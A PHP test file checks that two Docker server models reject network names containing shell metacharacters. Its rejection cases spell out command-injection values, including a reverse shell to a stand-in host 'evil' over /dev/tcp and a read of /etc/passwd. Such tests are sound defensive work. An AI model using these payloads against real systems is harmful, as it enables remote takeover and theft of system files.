49 lines
1.6 KiB
PHP
49 lines
1.6 KiB
PHP
|
<?php
|
||
|
|
|
||
|
|
use App\Models\StandaloneDocker;
|
||
|
|
use App\Models\SwarmDocker;
|
||
|
|
|
||
|
|
it('StandaloneDocker rejects network names with shell metacharacters', function (string $network) {
|
||
|
|
$model = new StandaloneDocker;
|
||
|
|
$model->network = $network;
|
||
|
|
})->with([
|
||
|
|
'semicolon injection' => 'poc; bash -i >& /dev/tcp/evil/4444 0>&1 #',
|
||
|
|
'pipe injection' => 'net|cat /etc/passwd',
|
||
|
|
'dollar injection' => 'net$(whoami)',
|
||
|
|
'backtick injection' => 'net`id`',
|
||
|
|
'space injection' => 'net work',
|
||
|
|
])->throws(InvalidArgumentException::class);
|
||
|
|
|
||
|
|
it('StandaloneDocker accepts valid network names', function (string $network) {
|
||
|
|
$model = new StandaloneDocker;
|
||
|
|
$model->network = $network;
|
||
|
|
|
||
|
|
expect($model->network)->toBe($network);
|
||
|
|
})->with([
|
||
|
|
'simple' => 'mynetwork',
|
||
|
|
'with hyphen' => 'my-network',
|
||
|
|
'with underscore' => 'my_network',
|
||
|
|
'with dot' => 'my.network',
|
||
|
|
'alphanumeric' => 'network123',
|
||
|
|
]);
|
||
|
|
|
||
|
|
it('SwarmDocker rejects network names with shell metacharacters', function (string $network) {
|
||
|
|
$model = new SwarmDocker;
|
||
|
|
$model->network = $network;
|
||
|
|
})->with([
|
||
|
|
'semicolon injection' => 'poc; bash -i >& /dev/tcp/evil/4444 0>&1 #',
|
||
|
|
'pipe injection' => 'net|cat /etc/passwd',
|
||
|
|
'dollar injection' => 'net$(whoami)',
|
||
|
|
])->throws(InvalidArgumentException::class);
|
||
|
|
|
||
|
|
it('SwarmDocker accepts valid network names', function (string $network) {
|
||
|
|
$model = new SwarmDocker;
|
||
|
|
$model->network = $network;
|
||
|
|
|
||
|
|
expect($model->network)->toBe($network);
|
||
|
|
})->with([
|
||
|
|
'simple' => 'mynetwork',
|
||
|
|
'with hyphen' => 'my-network',
|
||
|
|
'with underscore' => 'my_network',
|
||
|
|
]);
|